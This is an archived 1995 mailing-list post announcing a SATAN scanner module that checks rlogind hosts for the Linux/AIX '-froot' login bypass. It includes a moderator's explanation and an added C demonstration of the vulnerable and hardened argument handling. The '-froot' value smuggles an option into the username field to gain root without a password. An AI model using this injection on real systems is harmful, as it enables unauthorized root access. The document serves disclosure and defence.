[223] in linux-security and linux-alert archive
Satan module for Linux/AIX rlogin -froot bug
daemon@ATHENA.MIT.EDU (Aleph One)
Wed Apr 26 18:19:46 1995
Date: Wed, 26 Apr 1995 14:58:36 -0500 (CDT)
From: Aleph One <aleph1@dfw.net>
To: bugtraq@fc.net
Cc: satan@fish.com, linux-security@tarsier.cv.nrao.edu
Well, this is a small satan module I made as a quick hack to check
hosts that have rlogind running for the -froot bug. Drop it in
the bin directory in the satan directory. You also need to modify
the rules/jobs and config/paths.sh files. Look in login.satan and it
will tell you what to do. Also your rlogin may puke at the -froot
thinking it's a switch and not a parameter to -f. In that case get
Linux rlogin and compile. I haven't tried it against a buggy Linux box
yet but that's because I don't know of one. Anyway here it is.
a1
Content-Type: TEXT/PLAIN; charset=US-ASCII; name="login.satan"
Content-Transfer-Encoding: BASE64
Content-ID: <Pine.SUN.3.90.950426145836.11428B@dfw.net>
Content-Description: satan login module
[Mod: For those that may be late-comers to Linux, Linux (and AIX) shared
a particularly nasty hole for a while in that you could log in (at the
console or remotely) using "-fusername" and not be prompted for a
password--this applied to the root account as well. This problem was
announced in a CERT advisory (CA-94:09; May 23, 1994; message-id:
<9405231439.AA08522@delphi.cert.org>). This is one of the most serious
security holes that has been publicly acknowledged in Linux since its
adoption in "mainstream" circles, though most networked systems, and all
major distributions, have since plugged this hole (as the author sort of
indicates). --Jeff.]
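
The server-side flaw behind the "-fusername" login described above, shown beside a hardened form. This is an added example, not part of the original message, the SATAN module, or any vendor patch. It assumes a toy model of login's option parsing; the function names and the allowed-character policy are hypothetical.

```c
#include <ctype.h>
#include <stdio.h>
#include <string.h>

/* Toy model of login(1) option parsing (constructed, not the real source):
 * an argument starting with "-f" means "caller already authenticated this
 * user", so no password prompt. Returns 1 if the prompt would be skipped. */
int login_skips_password(int argc, const char *argv[])
{
    for (int i = 1; i < argc; i++) {
        if (strcmp(argv[i], "--") == 0 || argv[i][0] != '-')
            return 0;              /* options ended before any -f */
        if (argv[i][1] == 'f')
            return 1;              /* -f or -f<name>: pre-authenticated */
    }
    return 0;
}

/* Vulnerable pattern: the remote-supplied name goes straight into argv. */
int build_argv_naive(const char *remote_user, const char *argv[4])
{
    argv[0] = "login"; argv[1] = remote_user; argv[2] = NULL;
    return 2;
}

/* Hardened pattern: reject names that look like options or contain
 * unexpected bytes (assumed policy), then end option parsing with "--". */
int build_argv_hardened(const char *remote_user, const char *argv[4])
{
    if (remote_user[0] == '\0' || remote_user[0] == '-')
        return -1;
    for (const char *p = remote_user; *p; p++)
        if (!isalnum((unsigned char)*p) && !strchr("_.-", *p))
            return -1;
    argv[0] = "login"; argv[1] = "--"; argv[2] = remote_user; argv[3] = NULL;
    return 3;
}

int main(void)
{
    const char *names[] = { "alice", "-froot" }, *av[4];
    for (int i = 0; i < 2; i++) {
        int skip = login_skips_password(build_argv_naive(names[i], av), av);
        int n = build_argv_hardened(names[i], av);
        printf("%-7s naive: %s | hardened: %s\n", names[i],
               skip ? "NO PASSWORD PROMPT" : "prompt",
               n < 0 ? "rejected" : "prompt");
    }
    return 0;
}
```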